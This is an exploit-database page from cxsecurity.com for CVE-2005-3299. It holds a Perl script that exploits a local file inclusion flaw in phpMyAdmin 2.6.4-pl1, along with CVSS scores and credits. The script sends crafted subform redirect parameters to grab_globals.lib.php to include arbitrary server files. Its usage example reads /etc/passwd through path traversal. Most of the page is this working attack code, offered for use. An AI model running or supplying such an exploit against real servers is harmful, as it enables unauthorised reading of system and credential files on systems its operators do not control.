Exploit: phpMyAdmin 2.6.4-pl1 Local file inclusion exploit ( Ascii Version )

Search:
WLB2

phpMyAdmin 2.6.4-pl1 Local file inclusion exploit

Published / (Updated)
Credit
Risk
2005-10-10 / 2005-09-30
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
N/A
CVE-2005-3299
No
Yes

Plain text version

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

#!/usr/bin/perl
use IO::Socket;

# CXSecurity TEAM
# Maksymilian Arciemowicz
# Local file inclusion (./$FILE)
# simple exploit phpMyAdmin 2.6.4-pl1
#
#
# CXSecurity

if (@ARGV < 3)
{
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd\r\n\r\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE =
"usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1"
;;
$LENGTH = length $FILE;

print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort =>
"80") || die "Error 404\r\n\r\n";

print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".%HOST."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
printf "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n";
exit;
}

printf $odp;
}

References:

http://cxsecurity.com/issue/WLB-2005100029

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version